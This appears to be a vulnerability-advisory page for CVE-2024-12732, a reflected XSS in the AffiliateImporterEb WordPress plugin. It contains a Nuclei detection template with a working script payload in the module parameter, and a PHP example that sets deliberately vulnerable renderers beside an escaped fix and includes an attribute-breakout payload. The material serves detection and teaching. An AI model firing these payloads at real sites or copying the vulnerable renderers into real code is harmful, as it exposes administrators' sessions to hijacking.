AffiliateImporterEb <= 1.0.6 - Reflected XSS

CVE-2024-12732
Verified

Description

The AffiliateImporterEb WordPress plugin through 1.0.6 contains a reflected cross-site scripting (XSS) vulnerability: the module parameter of its ebdn-settings admin page (wp-admin/admin.php?page=ebdn-settings) is written back into the response without sanitization or output escaping. An attacker who needs no credentials of their own can craft a link carrying a script payload in that parameter; when a logged-in high-privilege user such as an administrator opens it, the script runs in that user's browser with their session. Because the page lives under wp-admin, the victim must be authenticated for the payload to render, which is why the template below logs in before sending the crafted request.

Severity

Medium

CVSS Score

6.1

Exploit Probability

0.2% (EPSS score 0.00199, percentile 0.42)

Affected Product

affiliateimportereb

Published Date

February 7, 2026

Template Author

sourabh-sahu

CVE-2024-12732.yaml
id: CVE-2024-12732

info:
  name: AffiliateImporterEb <= 1.0.6 - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    AffiliateImporterEb WordPress plugin through 1.0.6 contains a reflected XSS: the module
    parameter of its ebdn-settings admin page is reflected without sanitization or output
    escaping, letting an unauthenticated attacker who supplies a crafted link execute scripts
    in the browser of a logged-in high-privilege user such as an administrator.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to account compromise or unauthorized actions.
  remediation: |
    Update AffiliateImporterEb to a version later than 1.0.6; a correct fix escapes the reflected
    module parameter at output (esc_attr() for attribute values, esc_html() for element content).
  reference:
    - https://wpscan.com/vulnerability/bc46edd8-8d77-4567-873b-e9e90a01adcf/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-12732
    cwe-id: CWE-79
    epss-score: 0.00199
    epss-percentile: 0.41769
    cpe: cpe:2.3:a:cr1000:affiliateimportereb:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cr1000
    product: affiliateimportereb
  tags: cve,cve2024,cr1000,wp-scan,wordpress,wp-plugin,affiliateimportereb,authenticated,xss,wp

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=ebdn-settings&module=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "><script>alert(document.domain)</script>","affiliateimportereb")
        condition: and
# digest: 4b0a0048304602210084937425e6636a1f3bae62fc4b47023fa543a6ef8db655789a42c750e5afeb5d022100d86338e50f3c17a6ffb89ff41ed647e166246c57d868861ae140a648ccb4a67f:922c64590222798bb761d5b6d8e72950
Score:
6.1

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
CVE-2024-12732
CWE ID:
CWE-79

References

https://wpscan.com/vulnerability/bc46edd8-8d77-4567-873b-e9e90a01adcf/

Remediation Steps

Update AffiliateImporterEb to a version later than 1.0.6. A correct fix escapes the module parameter at the point of output (esc_attr() for attribute values, esc_html() for element content) rather than relying on input filtering alone.
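What the pattern behind this advisory and its fix look like in plugin code, as an added illustration that is not the AffiliateImporterEb plugin's own source. The settings-page renderer, its function names and the text field it writes are assumptions; the ebdn-settings page, the module parameter and the first payload come from the template above. It goes one step beyond the advisory text by showing why input sanitization alone does not close an attribute-context XSS and why escaping at output does. The WordPress helpers are stubbed with minimal stand-ins so the file runs with plain php outside WordPress:

```php
<?php
// Added example, not the AffiliateImporterEb plugin's source: an illustrative
// admin settings-page renderer that reflects the `module` request parameter,
// shown in the unescaped form the advisory describes, in a sanitize-only form
// that is still exploitable, and in the escaped form that fixes it.
// Function and field names are assumed; the first payload is the one the
// Nuclei template above sends, as PHP sees it after URL-decoding.

// Minimal stand-ins so the file runs with plain `php` outside WordPress; inside
// WordPress the real helpers are already defined and these blocks are skipped.
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( string $text ): string {
        return htmlspecialchars( $text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8' );
    }
}
if ( ! function_exists( 'wp_unslash' ) ) {
    function wp_unslash( string $value ): string {
        return stripslashes( $value );
    }
}
if ( ! function_exists( 'sanitize_text_field' ) ) {
    function sanitize_text_field( string $str ): string {
        // Approximates WordPress: strip tags, drop control characters, trim.
        // Like the real helper it leaves quotes alone, which matters below.
        return trim( preg_replace( '/[\x00-\x1F\x7F]/', '', strip_tags( $str ) ) );
    }
}

// Vulnerable: the raw parameter is concatenated into an attribute. A value
// like 1"><script>...</script> closes the attribute and the tag.
function render_module_field_vulnerable( array $get ): string {
    $module = $get['module'] ?? '';
    return '<input type="text" name="module" value="' . $module . '">';
}

// Sanitize-only: tag stripping removes <script> but not the quote that breaks
// out of the attribute, so an event-handler payload still reaches the browser.
function render_module_field_sanitized_only( array $get ): string {
    $module = sanitize_text_field( wp_unslash( $get['module'] ?? '' ) );
    return '<input type="text" name="module" value="' . $module . '">';
}

// Fixed: sanitize on input (defense in depth) and, decisively, escape at
// output with esc_attr(), which encodes " < > & ' for the attribute context.
// If module is really a numeric id, absint() on input is stricter still.
function render_module_field_fixed( array $get ): string {
    $module = sanitize_text_field( wp_unslash( $get['module'] ?? '' ) );
    return '<input type="text" name="module" value="' . esc_attr( $module ) . '">';
}

// Parses the rendered fragment the way a browser would and reports whether
// the reflected value stayed inside the value attribute: no <script> element
// and no attributes on the input beyond the three the renderer writes.
function reflection_contained( string $html ): bool {
    $doc = new DOMDocument();
    libxml_use_internal_errors( true );
    $doc->loadHTML( '<!DOCTYPE html><html><body>' . $html . '</body></html>' );
    libxml_clear_errors();
    if ( $doc->getElementsByTagName( 'script' )->length > 0 ) {
        return false;
    }
    $inputs = $doc->getElementsByTagName( 'input' );
    if ( $inputs->length !== 1 ) {
        return false;
    }
    foreach ( $inputs->item( 0 )->attributes as $attr ) {
        if ( ! in_array( $attr->name, array( 'type', 'name', 'value' ), true ) ) {
            return false;
        }
    }
    return true;
}

// Constructed requests: the template's payload, and an attribute-breakout
// payload that survives tag stripping.
$payloads = array(
    'script tag'         => '1"><script>alert(document.domain)</script>',
    'attribute breakout' => '1" autofocus onfocus="alert(document.domain)',
);
$renderers = array(
    'vulnerable'     => 'render_module_field_vulnerable',
    'sanitized only' => 'render_module_field_sanitized_only',
    'fixed'          => 'render_module_field_fixed',
);
foreach ( $payloads as $plabel => $payload ) {
    foreach ( $renderers as $rlabel => $renderer ) {
        $html = $renderer( array( 'module' => $payload ) );
        printf( "%-19s %-15s contained=%-3s %s\n", $plabel, $rlabel,
            reflection_contained( $html ) ? 'yes' : 'no', $html );
    }
}
```

Run it with php on the saved file. Only the escaped renderer keeps the value inside the attribute for both payloads; the sanitize-only renderer neutralizes the script-tag payload but lets the attribute-breakout payload through, which is why remediation for CWE-79 in WordPress code is to escape at the point of output (esc_attr() for attributes, esc_html() for element content) rather than to rely on sanitize_text_field() alone.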